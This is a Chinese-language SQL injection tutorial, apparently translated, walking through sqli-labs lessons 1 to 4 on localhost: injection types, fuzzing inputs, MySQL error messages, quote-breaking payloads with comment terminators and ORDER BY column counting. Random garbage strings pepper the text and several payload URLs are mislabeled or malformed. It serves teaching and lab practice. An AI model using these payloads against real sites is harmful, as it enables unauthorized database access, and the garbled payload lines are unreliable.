Sql Injection漏洞一直是在owasp排名第一的漏洞类型,有时候注入漏洞很难通过工具检测到.本文将详细介绍一下Sql Injection的各种类型,通过利用测试的环境,让大家对Sql Injection漏洞有比较多的了解.$ x: r; `7 _1 a3 U# T# W6 f: R
什么是sql injection漏洞?1 N/ }2 `* p( J0 A, d( r
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗数据库服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等。" @# `; J J% V. N! G
Sql Injection的类型
" |8 M8 x& C2 U# pSql注入根据数据提取通道的类型,从服务器接收到的响应等可以分为不同的类型.# z$ {% U$ O. W; x: J
3 z8 E1 a# ?$ Z# g2 q( J
基于从服务器接收到的响应
: \* B: j$ v/ a8 o3 o' K基于错误的SQL注入
9 L* Z. u1 b% {' b! V8 @( @7 g2 d联合查询的类型。2 q( M, ~0 L0 e
双击查询注射。6 v5 i9 @ O2 r6 H3 Y% d( u
SQL盲注* W. G" D0 a3 s9 e- a: ]
基于布尔SQL盲注。
& z- Z$ c3 @7 t- h6 H8 J1 N5 E( m基于时间的SQL盲注。) _, E* I: H$ u. C
基于错误的SQL注入主要是SQL Server转储一些错误给用户,通过应用程序的这个错误来进行利用的注入类型.下图中黄色部分显示的是错误。后面将详细的进行介绍。
9 O9 @! ?$ T% O5 A! X. G盲注漏洞是指在注射语句之后无法在前端看到后端数据库服务器的反应等,因此”盲”说明了一个事实,只能通过一些计算的假设进行尝试注入.
2 }1 p/ i! |( ?4 R0 z基于如何处理输入的SQL查询(数据类型) b Z- W* ~' ^: {
基于字符串
1 ]1 v# U7 C$ K8 Q( O: f$ e数字或整数为基础的/ |+ l* K3 r2 E5 J* {
根据后端SQL查询如何处理输入的参数的不同,可以将SQL注入分为字符串注入或整数为基础的注入。
4 ]1 \6 V+ O- ?+ |) y! N" {2 J基于程度和顺序的注入(哪里发生了影响)
0 p1 v; B/ f& d1 i$ q- q2 Y一阶注射! w* G+ i3 y5 } M! J/ x; u
二阶注射
, l3 _. i$ Y+ \) G( L& [5 m一阶注射是指输入的注射语句对WEB直接产生了影响,出现了结果;二阶注入类似存储型XSS,是指输入提交的语句,无法直接对WEB应用程序产生影响,通过其它的辅助间接的对WEB产生危害,这样的就被称为是二阶注入.5 ~8 o# S1 d5 @8 n B
基于注入点的位置上的
0 l) T( H/ _- `0 x1 K通过用户输入的表单域的注射。" S+ v' r! y& @- |8 C0 n/ D; G5 ~3 M7 e
通过cookie注射。8 x }! C/ b, k2 X; o8 w* U* s; T
通过服务器变量注射。 (基于头部信息的注射)
[' R3 n' D( [7 F为什么会发生SQL注入? 5 P4 }8 ~: Z, h0 M' @+ F/ c' Z
/ K6 q. L; v2 F一般来说,一个应用程序与后端数据库会在底层数据库驱动的帮助下,以查询的形式进行交互。 该驱动程序是依赖于正在使用的应用平台和后端数据库的类型,如MYSQL,MSSQL,DB2,ORACLE。
$ d- n8 O# K& f {一个通用的登录查询会大概是这样:
! e9 `9 ]4 Y& [3 D g`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’$variable1′ AND password=’$variable2′;`
9 H* \3 e3 H: C' ]+ f2 b0 F' K我们可以把这个查询分为两部分,代码段和数据段。 数据部分为$variable1 和 $variable2和用来定义字符串的边界的引号。
- E J$ V6 h; v; E+ z& _; x来演示一个实例,假设 在登录表单输入的正确用户名是admin,密码为p@ssw0rd,在后端数据库查询语句就会是如下:
% G/ B7 @ S) l9 K( k! H`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’admin′ AND password=’p@ssword′;`
: Z, p( B( D) S. @* M* ]因为是正确的帐号和密码,这样就可以成功的登录,如果用户恶意输入一些特殊意义的字符串,有可能会引发DB驱动程序的报错,比如在输入用户名为. H: C7 O* N3 m! N0 E% y
admin’,SQL查询语句将会变为:; e Z; c2 ~9 y) J# Z3 I; z
`SELECT Column1, Column2,Column3 FROM table_name WHERE username=’admin’′ AND password=’p@ssword′;`
7 ^) X1 R% M5 T- U K0 D; p: `7 G为什么会这样呢?因为用户的恶意输入打破了web应用程序的逻辑.
0 C" ?( r) j; W8 u' M& L7 v总结:当一个攻击者能够逃避数据的边界,他可以附加数据,产生可解释的SQL查询,在后端数据库执行之后,从而造成注入。3 r" E! z# Q. H$ d/ i; }
基于错误的SQL注入
4 A7 X7 N- W" U* s7 O在一般情况下,所有的编程语言为开发人员为了灵活的调试和修复他们的应用程序,通过使用一些内置的错误处理函数/库,来提供了友好的错误消息,以便可以简化故障排除时间等。& @5 @. P- z5 D5 d1 V1 \0 `, m4 a! V ]
通过输入特殊意义的字符串,根据错误信息的提示,来获取一些有用信息以及敏感数据的过程被列为基于错误的SQL注入。
* p' A+ N% x! f5 z$ p4 i2 n) w基于错误的注射,可分为两种主要类型:. a% @! ], Y5 ?$ u
联合查询类型( i; [. d, g& c. ^$ z
双击查询类型
2 t" ]+ H( k, V( a* m: `. y接下来详细讨论SQL注入的过程.
, z, x: N* m" {% ~这里我们搭建好了测试用的环境,测试的主要逻辑方法有一下几点:! J! m" C! ~$ z
枚举应用程序的行为
3 @5 ^7 e) o. P. k6 n7 h" `* B- A用伪造数据模糊测试导致应用程序产生报错, |2 X( S2 [) L
通过猜测在后端使用的SQL查询,尽量控制注入点。- W+ ^" x; h5 q% f- s2 \4 |
从后端数据库中提取数据4 Z; R" H3 v% w& F6 S( z
理论已经足够了,下面开始行动7 E0 W2 y% T8 h
枚举: 7 ~( U; {9 M1 A! j
- P6 D1 i5 i8 n' }8 m测试页面less1-less4基本上是相同的,当我们打开less1页面,要求我们输入一个ID值作为get参数.; h2 C n# Z9 R) E+ K
图+ L6 F. K" z; O) o
ID为数值,我们看到了一个特定的用户名和密码出现在屏幕上,ID的值是1到8之间。 对于任何其他的数值,屏幕上不会有结果显示.
/ j! v6 O+ Q E% U$ bid=15 => 页面上没有结果显示
$ `1 {/ `' C; k: t4 P* g$ y- t% O4 cid=14=>页面上没有结果显示
5 n2 n0 |# A- M* x) ~7 q# f4 y# `$ B3 E5 ]/ q9 N3 {9 a1 u' Z
ID=1 => Login name= Dumb, Password=Dumb; J2 W, A5 [; j( h* S/ p
ID=2 => Login name= Angelina, Password=I-kill-you
/ c: f4 J9 `1 o) O, R. XID=3 => Login name= Dummy, Password=p@ssw0rd
" A" M) R& Y2 cID=4 => Login name= secure, Password=crappy
& r% V3 y7 n0 {3 y1 d1 \3 { _4 tID=5 => Login name= stupid, Password=stupidity
" E# {$ l, m M# {: oID=6 => Login name= superman, Password=genious
" U3 L) B/ y n1 |+ @) E7 wID=7 => Login name= batman, Password=mob!le
) s7 k* y, z8 m7 E" K' C) O4 Z; L6 ?8 s1 R _. V
ID=8 => Login name= admin, Password=admin
1 f* ]7 N+ Y- b: ]& n* }ID=15 => 页面上没有结果显示
# Z( h2 I/ `1 G0 @1 x) J8 d8 ^ g3 e
ID=20 =>页面上没有结果显示9 q9 J6 [( ?4 u
5 o& t6 |/ x3 `& A K
ID=100 => 页面上没有结果显示
& T8 y0 [6 g+ d7 N$ \5 e结果枚举:数据库表中似乎有8条记录,任何不存在的ID值,它返回一个空集。
2 |1 P6 M" s/ M$ [6 @: }模糊测试: 1 U, j; n7 D/ z, B3 Y, H
* b) F/ \& e$ T+ g6 \ M
一般来说,应用程序开发人员假定用户将输入整数值。 尝试用模糊测试所有的应用程序输入点。 那么究竟什么是模糊? 这是一个过程,输入一些特殊意义的参数等,并尝试找到应用程序报错的差异反应。差异的报错表明可能存在漏洞。' \" x9 S9 M, u4 G+ o4 Q/ Z' {- Y( S, I
以下是一些任意的输入:6 G8 ^# f0 y- y- S- S
“
3 I4 P; p( d( D“ 0 w: K( v) J# H |# U! U8 T
\ # s8 |/ L. o9 k3 |" [$ i
; ) m. U$ g. T' W' }
%00 4 y. w0 L- `% V2 Y9 J' r" U
) & r7 W2 k- ]0 Z5 y; n: L
(
- G) h4 O A9 Q* ^! Eaaa 4 U# T8 H4 \9 t5 |" E3 \* a2 P+ n
整数或字符串测试:由于输入参数似乎是整数值,让我们尝试输入ID参数的字符串值,并观察其行为。( m$ R3 u( l5 z+ q0 \1 L
Less1: http://localhost/sqli-labs/Less-1/?id=asdf' I7 @! R# _2 Y+ r: r. |
Less2: http://localhost/sqli-labs/Less-2/?id=asdf
6 @8 \( S: I6 X7 \, \( v& N
! ~: W# t! j4 G: }; S* T% |Less3: http://localhost/sqli-labs/Less-3/?id=asdf
: C1 ~! R# }* ^, ~, OLess4: http://localhost/sqli-labs/Less-4/?id=asdf
- n9 A& u' q% \ - L4 f1 `' q7 I, W4 n/ o) g
整数和字符串测试的结果:我们看到,Less1、Less3、Less4返回的页面是空的,没有任何结果和报错,而Less2返回不同的,有一个MySQL错误消息。 从非常基本的编程技术,我们知道一个字符串参数始终包裹在单引号或双引号中,而整数不是这样。 因此,我们可以假设,Less1、Less3和Less4使用某种形式的引号包裹用户输入。他们认为输入的字符串值在数据库中不存在的,因此返回空值。Less2产生了一个错误提示,这意味着用户输入没有被引号包裹,因此整数型的输入在查询中正常工作,但是输入字符串值确产生了报错。 综上,我们可以推断出, less1、less3、less4是基于字符串的注入,而less2是一个整数型的注入。( V! A( ~+ J7 s4 s1 x
继续模糊化:现在,让我们进一步采取模糊的字符.( y1 L- ]" E3 `* g( L6 g4 h4 V
用单引号来进行测试' n6 R1 B+ n8 S0 }7 S7 C" u: W5 ^
less1; P/ J0 s0 z$ h; S# p }, h. u
http://localhost/sqli-labs/Less-1/?id=1‘
( S: l, O3 a. R7 `You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1′ at line 15 y0 w% l6 F% J4 W
less2! v0 Z: G) a, J5 z4 H; k/ s
http://localhost/sqli-labs/Less-2/?id=1 ’
- E! @! z% Y! X& \- TYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1′ at line 1
; @, g' \; `5 E6 A, d* V0 \6 o0 h1 p- q1 X$ u) [6 O1 k
less3
1 w/ y* P+ x7 v% t. rhttp://localhost/sqli-labs/Less-3/?id=1 ’
7 W2 F/ R; E% H8 x: iYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1′ at line 1
% j2 o) a- o( y) U' \) x所有这三个都产生错误提示,只有less4没有错误提示,反正正常的查询结果.0 E' k6 T/ x) L% f, I2 c2 i2 D
用双引号进行测试
b9 H) H: g& F1 y用双引号测试发现只有less4会产生错误提示,less1、less2、less3都返回正常的结果。
: v6 I7 W% L; \2 ?7 \$ Q
4 c+ [1 k+ r6 j! C0 k通过上面的测试,less1、less2、less3是单引号注入,而less4是双引号注入.$ m; X% \" e& G2 @8 ^
: B2 D" b$ H! Q综合所有的测试,less1、less3、less4是基于字符串的注入,而less2是基于数字的注入。+ {5 e) U T. a+ I* O
用\进行测试
2 t/ R) u$ Q; M! e9 Y H/ Z. H$ P“\”转义符在mysql中是为了打印具有特殊意义的字符串。测试结果如下:
* V3 n' k8 f8 xless1
& W. a! H# N b9 Z! b3 z0 n, hhttp://localhost/sqli-labs/Less-1/?id=1\
9 U J6 \$ D( F6 |7 S3 C" ]8 MYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ”1\’ LIMIT 0,1′ at line 1
0 H6 k+ P/ X6 |5 q9 F; I& X6 Dless2
* V/ R0 F8 U' ^2 K; j. V ohttp://localhost/sqli-labs/Less-2/?id=1\
" U* Z& J5 s+ x' ]* J* v1 VYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ‘\ LIMIT 0,1′ at line 1! k9 h4 n" Q$ P, w2 e( {, \
less3. ^ H Z% D) C: |
http://localhost/sqli-labs/Less-3/?id=1\
! U5 z( b- h7 iYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ”1\’) LIMIT 0,1′ at line 1
$ a" |: J/ ]( M$ w( ]! a* b" oless4# x% a& l' v# |9 T
http://localhost/sqli-labs/Less-4/?id=1\( [2 V8 {. v0 z7 G6 ?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ‘”1\”) LIMIT 0,1′ at line 1
& }9 X, T0 ], f ?9 L. V$ Z5 Dless1的报错,当我们输入1\的时候,报错信息中1\附近可以看到一个单引号,说明输入字符串是被单引号所包裹的。. K, o' n. L9 i0 Z" w- ?
less2的报错信息,当我们输入1\的时候,报错信息中没有返回引号,说明less2是一个整数类型的注入,不需要用引号来突破查询获取结果。) E& t$ W' u& w. ]6 D1 G$ j- f; @
less3报错信息,当我们输入1\的时候,报错信息中1\后面出现了’),说明应用程序中的变量是在括号中的,如(‘var’).6 O* z! C- C; ~# d3 z- x
less4的报错信息,当我们输入1\的时候,报错信息中1\后面出现了”),说明应用程序中的变量var是这样的,如(“var”).( i1 c/ U: w3 o4 _9 p) B5 x; b/ T0 z6 X
这四种情况在后端查询中使用的语句实际分别为:
0 i0 Y2 m6 D$ Z7 Y0 _1 u8 ZLess-1: SELECT * FROM TABLE_NAME WHERE ID=’$ID’ LIMIT 0,1
0 N5 M' I) o, B+ Q3 JLess-2: SELECT * FROM TABLE_NAME WHERE ID=$ID LIMIT 0,1
' Q1 t1 l& k2 f$ N/ b7 a. dLess-3: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,18 Z9 I( X+ Y- i% L+ j- W
Less-4: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1
; b3 B) S6 C2 K Q4 t$ R: O! I1 C# J- S; m+ z3 R
对于一个成功的注入,应该关闭查询语句中围绕在变量周围的分隔符,从而使我们逃避字符串/整数的编辑,并且成功执行sql语句.有两种方法,一种是注释掉其余的查询语句,另外一种是增加额外的分隔符,多余的分隔符使查询语句在语法上是正确的,如:
) g) o; R3 r# F: J1 \' o- X* @* yLess-1: SELECT * FROM TABLE_NAME WHERE ID=’ $ID ‘ LIMIT 0,1
5 m& P+ t4 Z0 e0 x0 y# X当我们输入的参数$ID的值为1‘,查询语句就会变成如下:6 b% Y& i/ S3 ?0 Z/ E) ~
SELECT * FROM TABLE_NAME WHERE ID=’ 1′ ‘ LIMIT 0,1+ B0 e8 E& M6 P0 q% o& J
现在这个查询语句是不正确的,我们需要解决多余的’号,这个’号是原始查询的一部分,可以用以下方法:; Z) X7 T% u0 o# n/ E! o
方法一: Q! ]. g& h- B" J6 z' e
可以使用sql注释来修复语法问题,mysql使用三种类型的注释:-+、#、/**/ 。因此我们可以使用1′-+或者1′#
; w& X0 t0 V8 u. J9 s1 S) Q查询语句将变为如下:- M% l' L) j1 ^" Y
SELECT * FROM TABLE_NAME WHERE ID=’ 1′–+ ‘ LIMIT 0,1
& c# c1 d6 B9 V* @$ U* ]. rSELECT * FROM TABLE_NAME WHERE ID=’ 1′ # ‘ LIMIT 0,16 r- U; m) p* o1 q% z8 `1 W
注射的完整URL如下:
: i( q G' {1 W1 c5 H! N2 @ Lhttp://localhost/sqli-labs/Less-1/?id=1′–+2 p: l7 d4 q4 t4 J; i! [
http://localhost/sqli-labs/Less-1/?id=1′ %23* f1 q6 n7 `* p! A
(%23是#号的url编码)
! n3 P. O6 F. P% G0 K2 H5 e+ @' F5 R* N在less2中,因为没有额外的引号,所以只需要注释掉后面的语句就可以了,查询语句和完整的sql注射URL如下:
+ u9 U+ C9 }: q; b) E) {http://localhost/sqli-labs/Less-2/?id=1–+
$ l0 d! ]3 w+ h9 W* h- K5 D- ~6 b6 M2 c1 b# h; h
ttp://localhost/sqli-labs/Less-2/?id=1 %23
+ i6 f" q* M7 Y& n8 i8 ~0 }0 qSELECT * FROM TABLE_NAME WHERE ID= 1–+ LIMIT 0,10 r3 h, @0 I$ U0 ]. l: J' e0 e
SELECT * FROM TABLE_NAME WHERE ID= 1# LIMIT 0,1
& _3 o" f# b; A( {$ Z2 W在less3中,我们推断后端sql语句如下:/ |) r0 l* A" e- S: @
SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1( Q. t" B5 I p2 p
所以我们需要想办法先关闭掉分隔符,然后再注释掉后面的语句$ K% {. I6 F7 H3 d/ R) P
SELECT * FROM TABLE_NAME WHERE ID=(‘ 1′) –+ ‘) LIMIT 0,1
: H& y. d0 q( y( _- \" T- lSELECT * FROM TABLE_NAME WHERE ID=(‘ 1′) # ‘) LIMIT 0,1; K3 K0 n; Z5 A' m: T
注射: 1′) –+ 1′) #7 i' t1 o; G9 m
完整的注射URL:( X# Y/ w b! J. k/ C% H3 p. X% j
http://localhost/sqli-labs/Less-2/?id=1‘)-+, {* f1 R, [) f! ]4 r; U
http://localhost/sqli-labs/Less-2/?id=1′) %23
$ g% ^* f2 F( U7 Q1 _8 F在less4中,我们推广后端sql语句如下:
9 T5 U3 w+ P, b' N5 P. WSELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1
2 X- w0 W" o; m x- \* Q同样,需要关闭掉分隔符,然后注释掉后面的语句
. g4 [5 {9 o7 X% ^1 K$ iSELECT * FROM TABLE_NAME WHERE ID=(” 1″) –+ “) LIMIT 0,1
" `% ^6 P+ b; v A+ s& w% FSELECT * FROM TABLE_NAME WHERE ID=(” 1″) # “) LIMIT 0,1
" k) ^1 M9 _; A. C注射: 1″) –+ 1″) #
5 P0 b9 E- V; u& E, G7 b# \http://localhost/sqli-labs/Less-2/?id=1″)–+
! c3 Q# Z6 D+ a2 ~, v k6 ehttp://localhost/sqli-labs/Less-2/?id=1 “)%23) g; D, F& {' j @8 c" u
通过查询了解表中的字段数' {3 e7 k5 R+ I9 K5 |( i
正如我们看到的,在枚举阶段,应用程序与数据库进行交互,并在网页上显示一些信息,这个过程经常会用到union语句联合查询数据库中的信息。使用union语句的一个限制是两个表或者多个表中的字段必须数量一致,因此需要用order by语句来判断字段数量。当只有N个字段时,如果你order by N+1或更大,就报错了。
! V! y1 T. t8 i8 [* @下面我们测试用order by 1,order by 2……等来查询观察结果.: M5 X r2 r. z# e! R
http://localhost/sqli-labs/Less-1/?id=1′ order by 1-+ 返回正常页面
, F+ |- p- u# Xhttp://localhost/sqli-labs/Less-1/?id=1′ order by 4-+返回错误页面,说明表中只有3列./ ~4 l/ u3 ~9 d( d. X2 T( b7 {
Lesson2:
( s4 M1 y; i xInjection: 1 ORDER BY 1 –+ => 没有错误.
3 i! s$ Z+ B( z) I2 B: n, n! {Injection: 1 ORDER BY 2–+ => 没有错误.
6 J" J! I! q5 c+ [% u% r' A+ TInjection: 1 ORDER BY 3 –+ => 没有错误.& b8 _3 F4 C' S ~; l4 D
Injection: 1 ORDER BY 4 –+ => 错误 – 可以确定表中只有三列.
+ N% l5 B) W5 S4 b3 u当我们知道了表中的字段数,我们就可以继续下一步查询相关的字段名或者字段值了。; r# M3 r0 h" _
* Q; G1 f+ Q% Y' K0 f0 _( @
本文是由阿德马翻译,转载请注明出处.本人有一个学习测试环境,目前还没有搭建好。 |